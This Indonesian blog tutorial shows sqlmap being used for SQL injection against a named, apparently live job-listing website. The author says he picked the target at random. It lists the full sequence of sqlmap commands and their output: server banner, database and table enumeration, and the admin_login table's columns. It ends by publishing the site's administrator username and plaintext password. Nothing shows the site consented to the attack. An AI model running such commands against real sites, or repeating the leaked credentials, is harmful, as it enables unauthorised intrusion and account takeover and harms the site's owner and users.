Tutorial sqlmap

Kali ini saya ingin bahas tentang penggunaan dasar salah satu SQL Injection tools dari platform linux. Sistem operasi yang saya gunakan yaitu Blackbuntu turunan dari ubuntu 10.10. Saya ingin bahas tentang sqlmap. Sedikit pengertian tentang sqlmap menurut saya, sqlmap yaitu salah satu tool untuk melakukan penetrasi pada suatu website dengan teknik SQL Injection. Tool ini bersifat free, mungkin pengguna windows sudah kenal dengan havij, sama fungsinya seperti havij bedanya tool ini jalan di console sedangkan havij dengan GUI nya yang tinggal klak-klik saja untuk melakukan penetrasi.

Tulisan ini dibuat dengan tujuan pembelajaran, gunakan dengan pertanggung jawaban sendiri. Ok, saya akan coba melakukan penetrasi secara acak, dan saya dapat target http://www.yourparttime.com/ dengan vulnerability di http://www.yourparttime.com/view-jobinfo.php?id=2097′

catatan:
1 --threads : max number sqlmap untuk membuka concurrent dari koneksi http
2 --random-agent : load random user agent dari default sqlmap,

Untuk penggunaan standar nya

root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "URL" --random-agent --threads X --banner --dbs --tables --columns --dump –dumpall

Pertama kita akan memfatach banner mysql

adhie70@dhiebuntu:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 --banner

fatch ini berfungsi untuk mendapatkan route dari web target sehingga akan lebih mudah sqlmap untuk mengeksplorasi. Lalu saya akan analisis fatch tersebut dengan perintah

adhie70@dhiebuntu:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 --current-user -currrent-db

Selanjutnya saya akan memfatch user dan db yang digunakan dengan flag

adhie70@dhiebuntu:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 --dbs

didapat

web server operating system: Linux Fedora 9 (Sulphur)
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0
[17:13:12] [INFO] fetching database names
[17:13:12] [INFO] the SQL query used returns 4 entries
[17:13:12] [INFO] starting 4 threads
[17:13:13] [INFO] retrieved: ypt_v2
[17:13:13] [INFO] retrieved: test
[17:13:13] [INFO] retrieved: ypt_db
[17:13:13] [INFO] retrieved: information_schema
available databases [4]:
[*] information_schema
[*] test
[*] ypt_db
[*] ypt_v2
[17:13:13] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.yourparttime.com'
[*] shutting down at 17:13:13

Terlihat database yang digunakan target. Saya akan mengambil salah satu yaitu database ypt_v2. Sekarang kita eksplorasi table dari database ypt_v2

adhie70@dhiebuntu:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 -D ypt_v2 --tables

dan saya mendapatkan

Database: ypt_v2

[71 tables]

+-----------------------+

| a_email_alert |

| a_sms_alert |

| ad_setting |

| admin_login |

| admin_login_log |

| agent |

| agent_inquiry |

| agent_promo |

| aging |

| apply_job |

| article |

| book |

| cc_info |

| cc_post_process |

| cc_pre_process |

| company_industry |

| company_logo |

| company_view |

| credit_history |

| credit_manage |

| data_capture |

| data_employer |

| data_history |

| data_publisher |

| email_alert |

| email_alert_temp |

| employee |

| employee_rate |

| employer |

| employer_rate |

| footer_ad |

| jane_ads |

| jane_payout |

| jane_report |

| job_category |

| job_title |

| launch |

| launch_sponsor |

| matching_job |

| matching_log |

| meet |

| news |

| newsletter |

| newsletter_achieve |

| payment |

| payment_log |

| polling_1 |

| post_ad |

| post_job |

| post_job_bak |

| post_job_history |

| pr_form |

| promo_history |

| promotion |

| publishers |

| search_resume |

| search_resume_log |

| search_shortlist |

| search_shortlist_log |

| skm |

| spec_art |

| spec_education |

| spec_hotel |

| spec_hr |

| spec_it |

| spec_sale |

| spec_service |

| temporary_remark |

| top_banner |

| traceurl |

| track_referral_code |

+----------------------- +

[17:15:26] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.yourparttime.com'

[*] shutting down at 17:15:26

wah ada 71 table yang kita dapat. Dan terlihat tabel admin_login disana. Saya langsung akan langsung cari kolom di admin_login

adhie70@dhiebuntu:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 -D ypt_v2 -T admin_login --columns

dan saya dapatkan

web server operating system: Linux Fedora 9 (Sulphur)

web application technology: PHP 5.2.6, Apache 2.2.8

back-end DBMS: MySQL 5.0

[17:19:13] [INFO] fetching columns for table 'admin_login' on database 'ypt_v2'

[17:19:14] [INFO] the SQL query used returns 4 entries

[17:19:14] [INFO] starting 4 threads

[17:19:14] [INFO] retrieved: admin_password

[17:19:15] [INFO] retrieved: admin_userid

[17:19:15] [INFO] retrieved: admin_name

[17:19:15] [INFO] retrieved: admin_id

[17:19:15] [INFO] retrieved: varchar(200)

[17:19:15] [INFO] retrieved: varchar(200)

[17:19:15] [INFO] retrieved: int(11)

[17:19:15] [INFO] retrieved: varchar(200)

Database: ypt_v2

Table: admin_login

[4 columns]

+--------------------+----------------+

| Column | Type |

+------------------- +----------------+

| admin_id | int(11) |

| admin_name | varchar(200) |

| admin_password | varchar(200) |

| admin_userid | varchar(200) |

+--------------------+----------------+

[17:19:16] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.yourparttime.com'

[*] shutting down at 17:19:16

wah saya mendapatkan admin_id, admin_name, admin_password, dan admin_password. Ok lanjut dapatkan data dari admin_name dan admin_password saja karena yang lainnya tidak kita butuhkan.

adhie70@dhiebuntu:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 -D ypt_v2 -T admin_login -C admin_name,admin_password –dump

web server operating system: Linux Fedora 9 (Sulphur)

web application technology: PHP 5.2.6, Apache 2.2.8

back-end DBMS: MySQL 5.0

do you want sqlmap to consider provided column(s):

[1] as LIKE column names (default)

[2] as exact column names

> 1

[17:22:30] [INFO] fetching columns LIKE 'admin_name, admin_password' for table 'admin_login' on database 'ypt_v2'

[17:23:01] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request

[17:23:01] [WARNING] if the problem persists please try to lower the number of used threads (--threads)

[17:23:19] [INFO] the SQL query used returns 2 entries

[17:23:19] [INFO] starting 2 threads

[17:23:21] [INFO] retrieved: admin_name

[17:23:21] [INFO] retrieved: admin_password

[17:23:21] [INFO] retrieved: varchar(200)

[17:23:21] [INFO] retrieved: varchar(200)

[17:23:22] [INFO] fetching column(s) 'admin_name, admin_password' entries for table 'admin_login' on database 'ypt_v2'

[17:23:23] [INFO] the SQL query used returns 1 entries

[17:23:23] [INFO] retrieved: Administrator

[17:23:23] [INFO] retrieved: ypt01234

Database: ypt_v2

Table: admin_login

[1 entry]

+-----------------+---------------------+

| admin_name | admin_password |

+-----------------+---------------------+

| Administrator | ypt01234 |

+-----------------+---------------------+

binggoooo kita dapat. Dan passwordnya tidak terenkripsi, beruntungnya.

Sekian tutorial dasar sqlmap, semoga bermanfaat.